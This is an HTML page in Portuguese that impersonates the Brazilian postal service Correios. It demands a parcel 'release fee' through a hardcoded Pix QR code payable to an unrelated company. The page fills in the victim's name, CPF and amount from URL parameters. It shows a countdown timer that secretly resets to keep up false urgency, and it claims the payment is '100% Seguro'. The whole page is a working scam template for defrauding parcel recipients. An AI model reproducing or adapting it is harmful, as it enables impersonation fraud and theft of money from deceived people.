<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta name="mobile-web-app-capable" content="yes">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Rastreamento</title>

    <link rel="shortcut icon" href="images/favi-ect.html">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/custom.css" rel="stylesheet ">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <link rel="stylesheet" href="../../cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer">
</head>

<body class="">
    <section id="acessibilidade">
        <a tabindex="1">Acessibilidade</a>        
    </section>

    <section id="menu">
        <a class="hamburger" tabindex="1"></a>
        <a class="logo" href="#0"></a>
        <a class="pesquisar"></a>
        <a class="entrar" href="#0"></a>
    </section>

    <main>
        <div class="container">
            <nav aria-label="breadcrumb">
                <div id="trilha">
                    Portal Correios <span><i class="fa fa-angle-right mx-2" aria-hidden="true"></i></span> Rastreamento <span><i class="fa fa-angle-right mx-2" aria-hidden="true"></i> </span> Pagamento
                </div>
            </nav>

            <div class="w-100 mx-auto">
                <div class="card-body border border-gray-300 p-4 mt-6 rounded-md shadow-md bg-gray-50 text-center col-400">
                    <h2 class="fs-3 fw-bold text-blue-600 mb-2">Taxa de Liberação</h2>
                    <p class="text-sm">Abra o app do seu banco, escaneie a imagem ou cole o código QR Code.</p>

                    <div class="py-1 imagem-qrcode" style="margin-bottom: 20px;"></div>
                    <div id="pixCode"></div>

                    <div class="my-2">
                        <button class="btn btn-primary btn-copiar-pix w-100"><i class="fas fa-copy"></i> <span>Copiar Código Pix</span></button>
                    </div>

                    <div class="row text-sm">
                        <p><b>Valor:</b> R$ <span id="taxa"></span></p>
                    </div>

                    <div class="pt-3 text-sm">
                        <p class="fw-bold text-sm">Identificação</p>
                        <div class="row">
                            <p><b>NOME:</b> <span id="taxa-nome"></span></p>
                        </div>
                        <div class="row">
                            <p><b>CPF:</b> <span id="taxa-cpf"></span></p>
                        </div>
                    </div>

                    <div class="timer-alert text-sm">
                        <span class="timer-text">Tempo:<br>
                            <b><span id="timer">10</span></b>
                        </span>
                    </div>

                    <script>
                        window.addEventListener("DOMContentLoaded", () => {
                            const urlParams = new URLSearchParams(window.location.search);
                            const nome = urlParams.get("nome") || "Cliente";
                            const cpf = urlParams.get("cpf") || "Não informado";
                            const valor = urlParams.get("valor") || "0,00"; // Valor padrão se não houver

                            // Corrige formatação do CPF se estiver sem pontos
                            const cpfFormatado = cpf.replace(/^(\d{3})(\d{3})(\d{3})(\d{2})$/, "$1.$2.$3-$4");

                            // Preencher na aba taxa
                            document.getElementById("taxa-nome").textContent = nome;
                            document.getElementById("taxa-cpf").textContent = cpfFormatado;
                            document.getElementById("taxa").textContent = valor; // Exibe o valor total
                        });
                    </script>

                    <div class="pt-3 text-sm">
                        <p class="color-gray" style="color: gray; opacity: 0.5;">Pagamento 100% Seguro</p>
                    </div>
                </div>
            </div>
        </div>
    </main>

    <script>
        $(document).ready(function () {
            const timerElement = $('#timer');
            let timeLeft = 300; // 5 minutos = 300 segundos
            timerElement.text(formatTime(timeLeft));

            function startTimer() {
                const countdown = setInterval(() => {
                    timeLeft--;
                    timerElement.text(formatTime(timeLeft)); // Atualizar o timer formatado

                    if (timeLeft <= 0) {
                        clearInterval(countdown); // Parar o contador
                        timeLeft = 300; // Reiniciar o timer para 5 minutos
                        timerElement.text(formatTime(timeLeft)); // Atualizar imediatamente
                        startTimer(); // Reiniciar o contador
                    }
                }, 1000);
            }

            // Iniciar o timer
            startTimer();

            // Função para formatar o tempo em MM:SS
            function formatTime(seconds) {
                const minutes = Math.floor(seconds / 60);
                const remainingSeconds = seconds % 60;
                return `${String(minutes).padStart(2, '0')}:${String(remainingSeconds).padStart(2, '0')}`;
            }

            // Gera o QR Code
            function gerarQrCode(codigoPix) {
                var img = document.createElement('img');
                img.src = "https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=" + encodeURIComponent(codigoPix); // URL da API de QR Code
                $('.imagem-qrcode').html(img); // Adiciona o QR Code na página
            }

            // Gera o Pix
            function gerarPix() {
                const valor = $('#taxa').text().replace('R$', '').replace(',', '.').trim(); // Obtém o valor da taxa
                const dadosPix = `00020126850014br.gov.bcb.pix2563pix.voluti.com.br/qr/v3/at/753c2d62-b513-403a-8ad7-2e0093cf8e7b5204000053039865802BR5921PAGAMENTO_SEGURO_LTDA6006CUIABA62070503***6304674A`;

                gerarQrCode(dadosPix); // Chama a função para gerar o QR Code
            }

            gerarPix(); // Chama a função para gerar o Pix
        });
    </script>

    <script src="../../cdn.jsdelivr.net/npm/qrcode/build/qrcode.min.js"></script>
    <script src="js/bootstrap.js"></script>
    <script src="js/bootstrap.bundle.min.js"></script>
    <script src="https://cdn.tailwindcss.com/"></script>
</body>

</html>
